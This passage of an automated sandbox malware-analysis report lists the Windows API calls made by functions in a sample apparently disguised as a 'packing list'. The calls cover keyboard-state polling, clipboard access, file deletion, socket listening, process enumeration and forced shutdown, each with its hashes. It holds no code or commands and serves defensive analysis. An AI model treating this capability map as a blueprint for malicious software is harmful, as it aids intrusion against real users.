                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00B81CAB
                                                  • _wcscmp.LIBCMT ref: 00B81CC0
                                                  • _wcscmp.LIBCMT ref: 00B81CD7
                                                    • Part of subcall function 00B76BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00B76BEF
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B81D06
                                                  • FindClose.KERNEL32(00000000), ref: 00B81D11
                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 00B81D2D
                                                  • _wcscmp.LIBCMT ref: 00B81D54
                                                  • _wcscmp.LIBCMT ref: 00B81D6B
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B81D7D
                                                  • SetCurrentDirectoryW.KERNEL32(00BE39FC), ref: 00B81D9B
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B81DA5
                                                  • FindClose.KERNEL32(00000000), ref: 00B81DB2
                                                  • FindClose.KERNEL32(00000000), ref: 00B81DC2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                  • String ID: *.*
                                                  • API String ID: 1824444939-438819550
                                                  • Opcode ID: c85011d82e34848bf28b55619e38e14d388d8365de9de1f1f24e6fc6a61d8806
                                                  • Instruction ID: 8f2dd060a65a20a7e3727319f542a6864338395f0e356677b19eb7b874c5e985
                                                  • Opcode Fuzzy Hash: c85011d82e34848bf28b55619e38e14d388d8365de9de1f1f24e6fc6a61d8806
                                                  • Instruction Fuzzy Hash: 0F31B33150161A6BCB10BFA8DC49BEE77ECDF45320F104AE5E911A31A1EB74DE46CB54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _memset
                                                  • String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
                                                  • API String ID: 2102423945-2023335898
                                                  • Opcode ID: b5b9e85e11fa42b75a3cb32b6fe8458a5e3f1286842371c35d9e167c2802cbac
                                                  • Instruction ID: c131bb63b67e7a948c37cffbb71f508514817b8b348eb61fc28677631ab85c0d
                                                  • Opcode Fuzzy Hash: b5b9e85e11fa42b75a3cb32b6fe8458a5e3f1286842371c35d9e167c2802cbac
                                                  • Instruction Fuzzy Hash: A3826CB1D0421ADBCB24CF98C8806EDB7F1FF49310F2581E9D859AB251EB74AD85CB90
                                                  APIs
                                                  • GetLocalTime.KERNEL32(?), ref: 00B809DF
                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B809EF
                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B809FB
                                                  • __wsplitpath.LIBCMT ref: 00B80A59
                                                  • _wcscat.LIBCMT ref: 00B80A71
                                                  • _wcscat.LIBCMT ref: 00B80A83
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B80A98
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80AAC
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80ADE
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00B80AFF
                                                  • _wcscpy.LIBCMT ref: 00B80B0B
                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B80B4A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: 130cbcf38e6f11f893f6d30004bd41d7f52a32e9f491507193a73238f646702c
                                                  • Instruction ID: e44a2f1bc1fa7944c846abf6c6696b2e52dd4037a66e5a66568461ede3bf586c
                                                  • Opcode Fuzzy Hash: 130cbcf38e6f11f893f6d30004bd41d7f52a32e9f491507193a73238f646702c
                                                  • Instruction Fuzzy Hash: C4618F725143059FC710EF64C885A9EB3E8FF89310F0449ADF989C7262EB35E949CB92
                                                  APIs
                                                    • Part of subcall function 00B6ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B6ABD7
                                                    • Part of subcall function 00B6ABBB: GetLastError.KERNEL32(?,00B6A69F,?,?,?), ref: 00B6ABE1
                                                    • Part of subcall function 00B6ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00B6A69F,?,?,?), ref: 00B6ABF0
                                                    • Part of subcall function 00B6ABBB: HeapAlloc.KERNEL32(00000000,?,00B6A69F,?,?,?), ref: 00B6ABF7
                                                    • Part of subcall function 00B6ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B6AC0E
                                                    • Part of subcall function 00B6AC56: GetProcessHeap.KERNEL32(00000008,00B6A6B5,00000000,00000000,?,00B6A6B5,?), ref: 00B6AC62
                                                    • Part of subcall function 00B6AC56: HeapAlloc.KERNEL32(00000000,?,00B6A6B5,?), ref: 00B6AC69
                                                    • Part of subcall function 00B6AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00B6A6B5,?), ref: 00B6AC7A
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00B6A6D0
                                                  • _memset.LIBCMT ref: 00B6A6E5
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00B6A704
                                                  • GetLengthSid.ADVAPI32(?), ref: 00B6A715
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00B6A752
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00B6A76E
                                                  • GetLengthSid.ADVAPI32(?), ref: 00B6A78B
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00B6A79A
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00B6A7A1
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00B6A7C2
                                                  • CopySid.ADVAPI32(00000000), ref: 00B6A7C9
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00B6A7FA
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00B6A820
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00B6A834
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: 3d154c5fe626c7880df627e35a5c307f926dc12ce762b484efda0f8d742764b1
                                                  • Instruction ID: 7260e17e8495596e3a73efd5b0e7d1d6a0119436c4e1759b57c2efc2a35ba426
                                                  • Opcode Fuzzy Hash: 3d154c5fe626c7880df627e35a5c307f926dc12ce762b484efda0f8d742764b1
                                                  • Instruction Fuzzy Hash: 4C513C71900209ABDF109F95DC95AEEBBB9FF04300F048169E911A7291EB799A06CF61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
                                                  • API String ID: 0-4052911093
                                                  • Opcode ID: e7a766410f0bb185ac7ad0c861604788365e77d78cb5597a5e576b2ac067f4b6
                                                  • Instruction ID: 981fbaa31ea375e93c812133aec8f04ae933de129df7842b8937786aacac7091
                                                  • Opcode Fuzzy Hash: e7a766410f0bb185ac7ad0c861604788365e77d78cb5597a5e576b2ac067f4b6
                                                  • Instruction Fuzzy Hash: 9D724DB1E042199BDB24CF59D8817FEB7F5FF48710F2481AAE815EB280DB709E419B94
                                                  APIs
                                                    • Part of subcall function 00B76EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B75FA6,?), ref: 00B76ED8
                                                    • Part of subcall function 00B772CB: GetFileAttributesW.KERNEL32(?,00B76019), ref: 00B772CC
                                                  • _wcscat.LIBCMT ref: 00B76441
                                                  • __wsplitpath.LIBCMT ref: 00B7645F
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00B76474
                                                  • _wcscpy.LIBCMT ref: 00B764A3
                                                  • _wcscat.LIBCMT ref: 00B764B8
                                                  • _wcscat.LIBCMT ref: 00B764CA
                                                  • DeleteFileW.KERNEL32(?), ref: 00B764DA
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00B764EB
                                                  • FindClose.KERNEL32(00000000), ref: 00B76506
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                  • String ID: \*.*
                                                  • API String ID: 2643075503-1173974218
                                                  • Opcode ID: 555a9af12c956511e9a9998f4e8a3705d66bb07e0e205285b6b2a57386b9ec1e
                                                  • Instruction ID: 729f473183172221a104eb382b47a5dbaec9480bf12d9829100e650c96a6ea37
                                                  • Opcode Fuzzy Hash: 555a9af12c956511e9a9998f4e8a3705d66bb07e0e205285b6b2a57386b9ec1e
                                                  • Instruction Fuzzy Hash: D83186B24083889AC721EBA48885EDB77DCAF56310F444AAAF9E8C3141EA35D54D8767
                                                  APIs
                                                    • Part of subcall function 00B93C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B92BB5,?,?), ref: 00B93C1D
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B9328E
                                                    • Part of subcall function 00B3936C: __swprintf.LIBCMT ref: 00B393AB
                                                    • Part of subcall function 00B3936C: __itow.LIBCMT ref: 00B393DF
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00B9332D
                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00B933C5
                                                  • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00B93604
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B93611
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1240663315-0
                                                  • Opcode ID: c00650c7dd4aa5170c70e5e74a99817f30322e4e22223576f7ba59cfd6e169cd
                                                  • Instruction ID: ee358b5e9305c88d5e53230c0f6fbab23c47a1dcfe5fdb3dfa32f3916e0c74c6
                                                  • Opcode Fuzzy Hash: c00650c7dd4aa5170c70e5e74a99817f30322e4e22223576f7ba59cfd6e169cd
                                                  • Instruction Fuzzy Hash: BBE15D71604200AFCB15DF28C995E2ABBE9FF89710F1485ADF44ADB261DB31EE05CB52
                                                  APIs
                                                  • GetKeyboardState.USER32(?), ref: 00B72B5F
                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00B72BE0
                                                  • GetKeyState.USER32(000000A0), ref: 00B72BFB
                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00B72C15
                                                  • GetKeyState.USER32(000000A1), ref: 00B72C2A
                                                  • GetAsyncKeyState.USER32(00000011), ref: 00B72C42
                                                  • GetKeyState.USER32(00000011), ref: 00B72C54
                                                  • GetAsyncKeyState.USER32(00000012), ref: 00B72C6C
                                                  • GetKeyState.USER32(00000012), ref: 00B72C7E
                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00B72C96
                                                  • GetKeyState.USER32(0000005B), ref: 00B72CA8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: State$Async$Keyboard
                                                  • String ID:
                                                  • API String ID: 541375521-0
                                                  • Opcode ID: 0d8d7f79ca12fcf9f78422434d4c3b21bd18117ddca6e8ccab8c439ed05dc21c
                                                  • Instruction ID: d29546ee08ea5a151ff320410d6cda3dbffd84cff2987573fbe4e376b8b9d578
                                                  • Opcode Fuzzy Hash: 0d8d7f79ca12fcf9f78422434d4c3b21bd18117ddca6e8ccab8c439ed05dc21c
                                                  • Instruction Fuzzy Hash: BF41A4345047C96AFF369B7489047A9BEE0EB31344F04C1D9D5DA572C2EB9499C4C7A2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                  • String ID:
                                                  • API String ID: 1737998785-0
                                                  • Opcode ID: d75b91c307cdaf386a744465104e0565b5ae54629a5492b7d9bfe9d982b37a93
                                                  • Instruction ID: a8427b31ea7612d1f22ae09b7c246b37cf908ba42bcf255652d9b159619e65a4
                                                  • Opcode Fuzzy Hash: d75b91c307cdaf386a744465104e0565b5ae54629a5492b7d9bfe9d982b37a93
                                                  • Instruction Fuzzy Hash: E4217C35700110AFDB11AF68DC89B2D77E8EF44711F0485A9F90ADB2A1EFB4E901DB95
                                                  APIs
                                                    • Part of subcall function 00B69ABF: CLSIDFromProgID.OLE32 ref: 00B69ADC
                                                    • Part of subcall function 00B69ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00B69AF7
                                                    • Part of subcall function 00B69ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00B69B05
                                                    • Part of subcall function 00B69ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00B69B15
                                                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00B8C235
                                                  • _memset.LIBCMT ref: 00B8C242
                                                  • _memset.LIBCMT ref: 00B8C360
                                                  • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 00B8C38C
                                                  • CoTaskMemFree.OLE32(?), ref: 00B8C397
                                                  Strings
                                                  • NULL Pointer assignment, xrefs: 00B8C3E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                  • String ID: NULL Pointer assignment
                                                  • API String ID: 1300414916-2785691316
                                                  • Opcode ID: 37f8d4ee824f836c13bd8cde5702af2fff6c2967d625ea58b25d8ff8ae9f01ea
                                                  • Instruction ID: e1646f111e83f50e5ca6ad4ecbf388afe0330598adebe6ce63c468ec1f1f0165
                                                  • Opcode Fuzzy Hash: 37f8d4ee824f836c13bd8cde5702af2fff6c2967d625ea58b25d8ff8ae9f01ea
                                                  • Instruction Fuzzy Hash: 4B910C71D00218ABDB10EF94DC95EDEBBF9EF04710F2081AAF515A7291EB705A45CFA0
                                                  APIs
                                                    • Part of subcall function 00B6B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B6B180
                                                    • Part of subcall function 00B6B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B6B1AD
                                                    • Part of subcall function 00B6B134: GetLastError.KERNEL32 ref: 00B6B1BA
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00B77A0F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 32f224712b772ec4054331c38dd1d33739af1c2cd33c213b7e702620187454b7
                                                  • Instruction ID: 6d25e64d453c9c3e994a4b03c3f35f8ea85920d1b8db43e34fb41d6b76fd3a67
                                                  • Opcode Fuzzy Hash: 32f224712b772ec4054331c38dd1d33739af1c2cd33c213b7e702620187454b7
                                                  • Instruction Fuzzy Hash: 4D01AC716D92166BF7285668DC9ABBF72D8DB00740F2485A4B967E20D1EDA55E0081A0
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B88CA8
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88CB7
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00B88CD3
                                                  • listen.WSOCK32(00000000,00000005), ref: 00B88CE2
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00B88CFC
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00B88D10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 1e56114d28731aaecc8224bb06446299212f916b621f4dba69ff69f3880c1c22
                                                  • Instruction ID: 6873d20449f40e30bc67f826f6fade2a1dd7ea48d4db1f8f5934df2ae4cd9f1a
                                                  • Opcode Fuzzy Hash: 1e56114d28731aaecc8224bb06446299212f916b621f4dba69ff69f3880c1c22
                                                  • Instruction Fuzzy Hash: 9A21A2716002019FCB10BF68DD85B6EB7E9EF48310F108198F916A72E2DF74AD41CB61
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00B76554
                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00B76564
                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00B76583
                                                  • __wsplitpath.LIBCMT ref: 00B765A7
                                                  • _wcscat.LIBCMT ref: 00B765BA
                                                  • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00B765F9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                                  • String ID:
                                                  • API String ID: 1605983538-0
                                                  • Opcode ID: db30ad9e654480ed5458b32a481bb415952eb0fa11b8149c03df0ffae8808d9d
                                                  • Instruction ID: c02219d3349aada76b05717b76f9936b4abf8c6410d49eaf0893eff104c11aac
                                                  • Opcode Fuzzy Hash: db30ad9e654480ed5458b32a481bb415952eb0fa11b8149c03df0ffae8808d9d
                                                  • Instruction Fuzzy Hash: C121957190021CABDB10ABA4CC88BDDB7FCEB14300F5044E9E909E7141EBB59F85DB60
                                                  APIs
                                                    • Part of subcall function 00B8A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 00B8A84E
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00B89296
                                                  • WSAGetLastError.WSOCK32(00000000,00000000), ref: 00B892B9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 4170576061-0
                                                  • Opcode ID: 2f29054f6b59659d66271c81e1ed3a6d229e7392d17941f62f1f005527afc898
